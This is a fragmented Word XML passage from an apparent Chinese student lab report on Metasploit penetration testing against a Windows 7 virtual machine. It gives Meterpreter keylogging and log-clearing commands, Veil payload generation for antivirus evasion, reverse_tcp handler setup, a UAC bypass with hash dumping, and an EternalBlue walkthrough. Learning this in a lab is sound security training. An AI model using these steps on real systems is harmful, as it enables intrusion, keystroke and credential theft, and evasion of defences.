    <w:p w14:paraId="32D9D5DE" w14:textId="77777777" w:rsidR="00DD6D99" w:rsidRPr="00DD6D99" w:rsidRDefault="00DD6D99" w:rsidP="00DD6D99">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11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session -i：允许用户切换会话。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69EE68B5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1）在MSFCONSOLE上启动一个活跃的会话。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A33D765" w14:textId="5A8D6042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93C4D63" wp14:editId="5EE6E288">
            <wp:extent cx="5274310" cy="1430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3042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2）通过利用系统的用户启动登录键盘输入。执行命令如下所示：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40D7237A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 &gt; keyscan_start</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1878CE73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Starting the keystroke sniffer…</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D94BE0F" w14:textId="77777777" w:rsidR="00DD6D99" w:rsidRPr="00DD6D99" w:rsidRDefault="00DD6D99" w:rsidP="00DD6D99">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12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捕获漏洞系统用户的键盘输入。执行命令如下所示：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E4C2CB2" w14:textId="21FBD76B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71BC10" wp14:editId="5FB4465A">
            <wp:extent cx="5274310" cy="17602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B48E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以上输出的信息表示在漏洞系统中用户输入了baidu.com，方向键、Tab键。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="182A8A39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4）停止捕获漏洞系统用户的键盘输入。执行命令如下所示：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33056FFE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 &gt; keyscan_stop</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72A64175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Stopping the keystroke sniffer…</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F2A0BB4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从输出的信息中可以看到键盘输入嗅探已停止。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B0FEF4D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5）删除漏洞系统上的一个文件。执行命令如下所示：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D5C4100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 &gt; del exploited.docx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="073689A6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6）清除漏洞系统上的事件日志。执行命令如下所示：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="524B6777" w14:textId="440C92C3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487746" wp14:editId="6E801E05">
            <wp:extent cx="3627120" cy="1112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28FB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7）查看正在运行的进程列表。执行命令如下所示：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26A9FC7A" w14:textId="6CA68988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6147A84" wp14:editId="7703ECF6">
            <wp:extent cx="5274310" cy="34855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9F3F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输出的信息显示了漏洞系统中正在运行的所有进程，包括进程的ID号、进程名、系统架构、用户及运行程序的路径等。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70B5264D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8）使用kill杀死漏洞系统中指定的进程号。执行命令如下所示：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="708B3FD2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91C5234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 &gt; kill 664</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E8A528F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Killing: 664</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B8DFE3B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9）尝试从漏洞系统窃取一个假冒令牌。执行命令如下所示：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="715F05CE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meterpreter &gt; steal_token</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="656EB103" w14:textId="77777777" w:rsidR="00DD6D99" w:rsidRPr="00DD6D99" w:rsidRDefault="00DD6D99" w:rsidP="00DD6D99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D99">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>注意：使用不同的模块，Meterpreter中的命令是不同的。有些模块中，可能不存在以上命令.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="727ADEC1" w14:textId="1BD12A5C" w:rsidR="005C53F9" w:rsidRDefault="005C53F9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252DAFF" w14:textId="7FA83EBA" w:rsidR="00DD6D99" w:rsidRDefault="00DD6D99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E7C6165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Veil是一款利用Metasploit框架生成相兼容的Payload工具，并且在大多数网络环境中能绕过常见的杀毒软件。本节将介绍Veil工具的安装及使用。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64B13A2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在Kali Linux中，默认没有安装Veil工具。这里首先安装Veil工具，执行如下所示的命令：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E0FE70A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apt-get install veil</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="431F6FC8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lastRenderedPageBreak/>
        <w:t>执行以上命令后，如果安装过程没有提示错误的话，则表示Veil工具安装成功。由于安装该工具依赖的软件较多，所以此过程时间有点长。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28101CF5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【实例6-5】演示使用Veil工具中的载荷（本例以cs/meterpreter/rev_tcp为例），进行渗透攻击（这里以Windows 7作为攻击靶机）。具体操作步骤如下所示。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D33998E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1）启动Veil工具。执行命令如下所示：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F96990E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veil</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F7A77F8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执行以上命令后。如下所示：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38591C51" w14:textId="4D82257C" w:rsidR="00652C9A" w:rsidRPr="00652C9A" w:rsidRDefault="00F45132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5132">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="14E4D566" wp14:editId="5B2DA45C">
            <wp:extent cx="5274310" cy="52876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243E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从以上信息中可以看到在Veil下，有2个工具可用，并列出了可用的命令。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="139B500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在输出的信息中看到[Veil &gt;：] 提示符，就表示Veil登录成功了。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="485A7097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2）使用Evasion工具，输入命令use 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="509E2C58" w14:textId="474B8261" w:rsidR="00652C9A" w:rsidRPr="00652C9A" w:rsidRDefault="00F45132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513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6D5AEC3" wp14:editId="7FB3231B">
            <wp:extent cx="5274310" cy="28594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FD7D" w14:textId="77777777" w:rsidR="00652C9A" w:rsidRPr="00652C9A" w:rsidRDefault="00652C9A" w:rsidP="00652C9A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13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使用list命令，查看可加载的工具模块，执行命令如下所示：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3664963A" w14:textId="069C56C3" w:rsidR="00652C9A" w:rsidRPr="00652C9A" w:rsidRDefault="00F45132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513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6B93B1A" wp14:editId="24E5C45B">
            <wp:extent cx="5274310" cy="5734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058A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4）选择cs/meterpreter/rev_tcp攻击载荷。在攻击载荷列表中，cs/meterpreter/rev_tcp载荷的编号是11。执行命令如下所示：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05B54A24" w14:textId="5ECD51BC" w:rsidR="00652C9A" w:rsidRPr="00652C9A" w:rsidRDefault="009E0022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002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5C57A7C" wp14:editId="0F4CD596">
            <wp:extent cx="5274310" cy="46850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F3BD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输出信息显示了rev_tcp攻击载荷可配置的选项参数。这里默认指定的本地端口（LPORT）是4444，LHOST选项还没有配置。LHOST即为本地网络地址的意思，使用命令行ip addr进行查看。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28385707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5）配置LHOST选项参数，并查看攻击载荷的详细信息。执行命令如下所示：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="146F7852" w14:textId="77D8F5A5" w:rsidR="00652C9A" w:rsidRPr="00652C9A" w:rsidRDefault="007A1B7E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A1B7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954AEDB" wp14:editId="4A6730A3">
            <wp:extent cx="5274310" cy="5125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8DED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从输出的信息中，可以看到rev_tcp攻击载荷的详细信息，如攻击载荷名、语言、级别及配置的选项参数等。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06BC700D" w14:textId="77777777" w:rsidR="00652C9A" w:rsidRPr="00652C9A" w:rsidRDefault="00652C9A" w:rsidP="00652C9A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14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此时，使用generate命令生成载荷文件。执行命令如下所示：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="062369FC" w14:textId="488665F1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1FADD6" wp14:editId="59D12BB3">
            <wp:extent cx="5274310" cy="19342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920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在以上命令中指定一个文件名为backup。然后按下回车键，将显示如下所示的信息：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45E1150D" w14:textId="74EC27DB" w:rsidR="00652C9A" w:rsidRPr="00652C9A" w:rsidRDefault="00DA3163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A316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2C1FDF6" wp14:editId="3C9FE501">
            <wp:extent cx="5274310" cy="50628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782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从输出的信息中可以看到生成一个可执行文件backup.exe，并且该文件保存在/var/lib/veil/output/compiled/backup.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="589A4CC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此时将可执行文件backup.exe发送到目标主机上，就可以利用该攻击载荷了。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="327F3585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这里由于涉及到两个虚拟机之间的文件发送，学生可以采用网盘的形式，在kali的浏览器中上传backup.exe到网盘，再到win7虚拟机环境里去下载即可。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55350C0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接下来需要使用Metasploit创建一个远程处理器，等待目标主机连接到Kali Linux（攻击主机）操作系统。连接成功后，就获取到一个远程Shell命令。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F1A504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【实例6-6】创建远程处理器。具体操作步骤如下所示。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F86FD2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1）启动MSF终端。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58A9912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msfconsole</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C32B83E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2）使用handler模块。执行命令如下所示：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40D3275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lastRenderedPageBreak/>
        <w:t>msf &gt; use exploit/multi/handler</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F9A434C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3）加载reverse_tcp攻击载荷，并设置其选项参数。执行命令如下所示：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C14A80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 exploit(handler) &gt; set payload windows/meterpreter/reverse_tcp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F7E0FB3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payload =&gt; windows/meterpreter/reverse_tcp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="422CF7A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 exploit(handler) &gt; set LHOST 192.168.122.185</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5224BEC4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LHOST =&gt; 192.168.122.185</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66B758E4" w14:textId="070019B3" w:rsid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 exploit(handler) &gt; exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29E6AD91" w14:textId="78DBEDF9" w:rsidR="00B901BE" w:rsidRPr="00652C9A" w:rsidRDefault="00B901BE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901BE">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="28455FFF" wp14:editId="7FAEAA79">
            <wp:extent cx="5274310" cy="51327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0E0D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从输出信息可以看到攻击载荷已启动，正在等待连接目标主机。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2259DFC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此时将前面生成的可执行文件backup.exe发送到目标主机（Windows 7），并运行该可执行文件。然后返回到Kali Linux操作系统，将看到如下所示的信息：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CEB24C4" w14:textId="1F20D556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9A505BB" wp14:editId="0A2AE5FF">
            <wp:extent cx="5274310" cy="53841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1FC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从以上信息中，可以看到成功打开了一个Meterpreter会话。这表示已成功渗透攻击目标主机，现在就可以进行一些Shell命令。如进行目标主机的Shell环境，执行命令如下 所示：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D9790E9" w14:textId="455D6DDA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C4C2BD3" wp14:editId="4BC94A71">
            <wp:extent cx="5274310" cy="37903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159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输出的信息表示进入了目标系统Windows 7的命令行，并且当前目标系统登录的用户是Administrator</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="440CC8C7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如果以上用户没有太高权限时，可以使用Metasploit中的bypassuac模块绕过UAC（用户访问控制），进而提升用户的权限。下面将介绍使用bypassuac模块提升以上用户的权限。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="397F62A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1）将Meterpreter会话，调用到后台运行。执行命令如下所示：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66F914E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meterpreter &gt; background</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CA4F45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Backgrounding session 1…</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F3F379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从输出的信息中，可以看到当前后台运行的会话编号是1。该会话编号需要记住，在后面将会用到。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1744E232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2）查看会话详细信息。执行命令如下所示：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48A64412" w14:textId="208A5026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5319220" wp14:editId="270F556F">
            <wp:extent cx="5274310" cy="5034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515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从输出信息中可以看到该会话中，连接到目标系统的运行架构、计算机名及IP地址。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47D23DA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3）使用bypassuac模块，并查看可配置的选项参数。执行命令如下所示：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67953152" w14:textId="558E0C6E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57FAFB4" wp14:editId="5CA663BA">
            <wp:extent cx="5274310" cy="48583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135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从输出信息中，可以看到模块选项中有一个可配置的选项参数SESSION。该选项的值，就是当前后台运行的会话编号。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BFC0648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4）设置SESSION选项参数。如下所示：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E89DBA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 exploit(bypassuac) &gt; set session 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19BCC4A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session =&gt; 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79D00CFB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5）启动渗透攻击。执行命令如下所示：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D8EF7BD" w14:textId="680AA8E5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BFE48E8" wp14:editId="3266ABC2">
            <wp:extent cx="5274310" cy="30308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DF8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这里显示该用户已经是最高的权限了。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F0738E1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以下是一个没有最高权限的用户，实例输出信息：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="131DF7F7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msf exploit(bypassuac) &gt; exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FBE8B9A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Started reverse handler on 192.168.6.103:4444</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BFEA115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UAC is Enabled, checking level…</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0276928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[+] UAC is set to Default</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19DEF33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[+] BypassUAC can bypass this setting, continuing…</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19267AF4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[+] Part of Administrators group! Continuing…</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74479C8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Uploaded the agent to the filesystem….</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A4E0372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Uploading the bypass UAC executable to the filesystem…</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DE72307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Meterpreter stager executable 73802 bytes long being uploaded..</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47378BB3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Sending stage (769536 bytes) to 192.168.6.106</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38F728CC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[*] Meterpreter session 2 opened (192.168.6.103:4444 -&gt; 192.168.6.106:49206) at 2014-07-18 10:15:38 +0800</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CE4DA9F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meterpreter &gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72A3EEA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从输出的信息中，可以看到目前登录的用户实际上是属于管理组的成员，并且绕过了UAC创建了一个新的会话。此时就可以提升用户的权限了。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1607AEA0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6）查看Administrator用户的信息。执行命令如下所示：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FC2F2E3" w14:textId="6319F0C2" w:rsidR="00652C9A" w:rsidRPr="00652C9A" w:rsidRDefault="00760E14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60E1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5363EDB" wp14:editId="3F7042D3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C23C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7）提升用户的权限，并查看其用户信息。执行命令如下所示：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79E4547B" w14:textId="67F7BEF0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232125" wp14:editId="6849881D">
            <wp:extent cx="5274310" cy="6737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E6F9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从输出信息中可以看到当前用户，拥有了系统级别的权限。此时，可以进行任何的操作。如捕获目标系统中，用户的密码哈希值。执行命令如下所示：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="106EB4B4" w14:textId="24BDD041" w:rsidR="00652C9A" w:rsidRPr="00652C9A" w:rsidRDefault="00A424D2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424D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0EB031D" wp14:editId="16F72A71">
            <wp:extent cx="5274310" cy="51803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137E" w14:textId="77777777" w:rsidR="00652C9A" w:rsidRPr="00652C9A" w:rsidRDefault="00652C9A" w:rsidP="00652C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52C9A">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>从输出的信息中，可以看到它们的UID及密码哈希值。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="747B5A75" w14:textId="4652A8E0" w:rsidR="00DD6D99" w:rsidRDefault="00DD6D99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C256C35" w14:textId="77777777" w:rsidR="00652C9A" w:rsidRPr="00652C9A" w:rsidRDefault="00652C9A" w:rsidP="003123B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47B377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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26BCACDB" w14:textId="16B7F327" w:rsidR="00A048C5" w:rsidRDefault="00A424D2" w:rsidP="00A048C5">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>见上图</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F40121F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实验数据处理</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4803EA74" w14:textId="3C5ADC00" w:rsidR="00A048C5" w:rsidRDefault="00A424D2" w:rsidP="00A048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14:paraId="59465103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lastRenderedPageBreak/>
        <w:t>实验结果与分析</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="799EB701" w14:textId="77777777" w:rsidR="00A048C5" w:rsidRPr="00A1332D" w:rsidRDefault="00A048C5" w:rsidP="00A048C5"/>
    <w:p w14:paraId="1FBF6DEF" w14:textId="5D2DA1E1" w:rsidR="004F460F" w:rsidRDefault="002268A4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>学习并实践了渗透工具</w:t>
      </w:r>
      <w:r w:rsidRPr="002268A4">
        <w:t>MSFCONSOLE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，并用多种方法渗透。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="343327CF" w14:textId="298B0279" w:rsidR="00F87BD0" w:rsidRDefault="00F87BD0"/>
    <w:p w14:paraId="54EAA05E" w14:textId="1B2098CE" w:rsid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t>使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00F87BD0">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Metasploit渗透攻击Windows7并远程执行命令</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DDD78BE" w14:textId="77777777" w:rsidR="00F87BD0" w:rsidRPr="00F87BD0" w:rsidRDefault="00F87BD0" w:rsidP="00F87BD0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b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>环境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实验环境：kali系统，Windows7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kali IP：192.168.38.136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win7 IP：192.168.38.56</w:t>
      </w:r>
      <w:r w:rsidRPr="00F87BD0">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t>大家可以将这两个操作系统安装到虚拟机中，或者用两台电脑进行实验。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="246DCDA4" w14:textId="77777777" w:rsidR="00F87BD0" w:rsidRPr="00F87BD0" w:rsidRDefault="00F87BD0" w:rsidP="00F87BD0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b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Metasploit简介</w:t>
      </w:r>
      <w:r w:rsidRPr="00F87BD0">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t>Metasploit是目前世界上领先的渗透测试工具，也是信息安全与渗透测试领域最大的开源项目之一。它彻底改变了我们执行安全测试的方式。</w:t>
      </w:r>
      <w:r w:rsidRPr="00F87BD0">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t>Metasploit之所以流行，是因为它可以执行广泛的安全测试任务，从而简化渗透测试的工作。Metasploit适用于所有流行的操作系统，本文使用Kali Linux。因为Kali Linux预装了 Metasploit 框架和运行在框架上的其他第三方工具。</w:t>
      </w:r>
      <w:r w:rsidRPr="00F87BD0">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t>本次攻击是利用Windows7的永恒之蓝进行攻击，下面是对永恒之蓝的简单介绍：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2376E465" w14:textId="77777777" w:rsidR="00F87BD0" w:rsidRPr="00F87BD0" w:rsidRDefault="00F87BD0" w:rsidP="00F87BD0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b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>永恒之蓝概述</w:t>
      </w:r>
      <w:r w:rsidRPr="00F87BD0">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t>永恒之蓝是指2017年4月14日晚，黑客团体Shadow Brokers（影子经纪人）公布一大批网络攻击工具，其中包含“永恒之蓝”工具，“永恒之蓝”利用Windows系统的SMB漏洞可以获取系统最高权限。5月12日，不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒，英国、俄罗斯、整个欧洲以及中国国内多个高校校内网、大型企业内网和政府机构专网中招，被勒索支付高额赎金才能解密恢复文件。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2324CC09" w14:textId="77777777" w:rsidR="00F87BD0" w:rsidRPr="00F87BD0" w:rsidRDefault="00F87BD0" w:rsidP="00F87BD0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b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>渗透流程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1. 已知漏洞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2. 查找模块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3. 配置程序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4. 添加后门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t>5. 进行攻击</w:t>
      </w:r>
      <w:r w:rsidRPr="00F87BD0">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00F87BD0">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>具体步骤</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55B44AD6" w14:textId="3813EBDA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EE93AC" wp14:editId="720800CF">
            <wp:extent cx="2286000" cy="22860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DE38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br/>
        <w:t>因Metasploit 程序需要使用 Postgresql数据库，先打开数据库</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4304C217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t>systemctl start postgresql</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2896CB98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C0D3FFD" w14:textId="051D569E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909D00" wp14:editId="0D9D1B5A">
            <wp:extent cx="5274310" cy="11195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A878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br/>
        <w:t>在kali中打开msf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74B80272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t>msfconsole</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5242BD1C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55DB203" w14:textId="478A491A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41E1147" wp14:editId="4EFC7E68">
            <wp:extent cx="5274310" cy="357251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0AEF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C475799" w14:textId="76A83552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E128A18" wp14:editId="15E631D8">
            <wp:extent cx="5274310" cy="4867275"/>
            <wp:effectExtent l="0" t="0" r="254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948C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667A462" w14:textId="572BAEF0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1E30E38" wp14:editId="4B319FD6">
            <wp:extent cx="5274310" cy="43916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4887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85D1F82" w14:textId="6AD8321E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307A3EF" wp14:editId="0F8FDF2B">
            <wp:extent cx="5274310" cy="29140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AE78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7C81AA5" w14:textId="1D713CC8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2B2F8BD" w14:textId="506C8007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D7861CF" wp14:editId="78046B16">
            <wp:extent cx="5274310" cy="48069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1D4" w14:textId="2B6B5C18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404C5EE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62A1539" w14:textId="1AA27C97" w:rsidR="00F87BD0" w:rsidRPr="00F87BD0" w:rsidRDefault="009E772B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772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926A72" wp14:editId="6E88B9E7">
            <wp:extent cx="5274310" cy="9461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CC7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5C5B572" w14:textId="579521B3" w:rsidR="00F87BD0" w:rsidRPr="00F87BD0" w:rsidRDefault="003D3E1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D3E1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E0335C" wp14:editId="636FEAF2">
            <wp:extent cx="5274310" cy="470027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7DE8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8C0D631" w14:textId="0F3ABD6D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8E5F662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929EC9D" w14:textId="3E60D963" w:rsidR="00F87BD0" w:rsidRPr="00F87BD0" w:rsidRDefault="003D3E1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D3E1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4807273" wp14:editId="1B817F8D">
            <wp:extent cx="5274310" cy="1520825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FC19" w14:textId="77777777" w:rsidR="00A138A3" w:rsidRDefault="00A138A3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138A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9AA609" wp14:editId="59A31DF0">
            <wp:extent cx="5274310" cy="48647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AA2B" w14:textId="77777777" w:rsidR="00A138A3" w:rsidRDefault="00A138A3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138A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00F5B25" wp14:editId="25ECC441">
            <wp:extent cx="5274310" cy="19380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02CD" w14:textId="4975B1DA" w:rsidR="00F87BD0" w:rsidRPr="00F87BD0" w:rsidRDefault="00A138A3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此处win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虚拟机已修复此漏洞。如果没有修复，继续</w:t>
      </w:r>
      <w:r w:rsidR="00F87BD0" w:rsidRPr="00F87BD0">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="00F87BD0" w:rsidRPr="00F87BD0">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>到此，我们已经配置好漏洞相关参数了，接下来我们设置攻击载荷。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42E33C0D" w14:textId="1F14DAA6" w:rsidR="00F87BD0" w:rsidRPr="00F87BD0" w:rsidRDefault="003D3E1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D3E1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14D36A" wp14:editId="7E393C01">
            <wp:extent cx="5274310" cy="42138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6CD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FA2C56A" w14:textId="7A826A39" w:rsidR="00F87BD0" w:rsidRPr="00F87BD0" w:rsidRDefault="003D3E1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D3E1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31FE98" wp14:editId="4A485255">
            <wp:extent cx="5274310" cy="92837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D2A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3433CF0" w14:textId="371F0E35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585A460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2FF9A8A" w14:textId="2B692D0F" w:rsidR="00F87BD0" w:rsidRDefault="0092002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2002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3937E86" wp14:editId="1EA7EE2E">
            <wp:extent cx="5274310" cy="20294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63D3" w14:textId="5EABAFDB" w:rsidR="0092002F" w:rsidRDefault="0092002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B864EA8" w14:textId="77777777" w:rsidR="0092002F" w:rsidRPr="00F87BD0" w:rsidRDefault="0092002F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2D88BA7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87278AF" w14:textId="4334C18D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A8CA472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08D7F35" w14:textId="59F21CDB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F55ED46" w14:textId="0059438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br/>
        <w:t>成功进入了win7，</w:t>
      </w:r>
      <w:r w:rsidR="00A138A3">
        <w:rPr>
